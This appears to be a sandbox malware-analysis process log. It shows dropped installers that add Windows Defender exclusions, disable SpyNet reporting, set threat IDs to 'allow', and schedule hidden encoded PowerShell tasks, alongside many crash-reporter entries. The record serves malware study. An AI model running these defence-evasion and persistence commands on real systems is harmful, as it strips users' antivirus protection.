C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:19⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:19⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:19⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21084⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\JhCdhHbm\g8soNXAr8ZzH9E8K.exeC:\Users\Admin\AppData\Local\Temp\JhCdhHbm\g8soNXAr8ZzH9E8K.exe /S /site_id=7576744⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS7EDF.tmp\Install.exe.\Install.exe /S /site_id=7576745⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8884.tmp\Install.exe.\Install.exe /S /site_id "757674" /S /site_id=7576746⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsGIKHqVm" /SC once /ST 15:43:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsGIKHqVm"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsGIKHqVm"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bFZpgwNlQHGZXuKxuE" /SC once /ST 21:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf\CPfhbPwQuahfpxY\AbTWeSE.exe\" 9i /site_id 757674 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20764⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\SSotFuFE\OLSqPmjUAse.exeC:\Users\Admin\AppData\Local\Temp\SSotFuFE\OLSqPmjUAse.exe /silentus SUB=1df4967a8b55e0254e559fb7330da0364⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IBFD3.tmp\is-1FTFD.tmp"C:\Users\Admin\AppData\Local\Temp\is-IBFD3.tmp\is-1FTFD.tmp" /SL4 $100050 "C:\Users\Admin\AppData\Local\Temp\SSotFuFE\OLSqPmjUAse.exe" 2460054 52736 /silentus SUB=1df4967a8b55e0254e559fb7330da0365⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\PES Disk Master\pes58.exe"C:\Program Files (x86)\PES Disk Master\pes58.exe" /silentus SUB=1df4967a8b55e0254e559fb7330da0366⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pes58.exe" /f & erase "C:\Program Files (x86)\PES Disk Master\pes58.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pes58.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 18204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 21284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 20764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 12164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22524⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22724⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15884⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17844⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 22684⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19404⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19844⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17724⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 16524⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19764⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15924⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 17644⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 15924⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 19484⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2284 -s 1404⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 952 -ip 9521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 952 -ip 9521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 952 -ip 9521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 952 -ip 9521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2284 -ip 22841⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2284 -ip 22841⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2284 -ip 22841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2284 -ip 22841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2284 -ip 22841⤵
-
C:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf\CPfhbPwQuahfpxY\AbTWeSE.exeC:\Users\Admin\AppData\Local\Temp\OjMvmTgzssfiXiGwf\CPfhbPwQuahfpxY\AbTWeSE.exe 9i /site_id 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
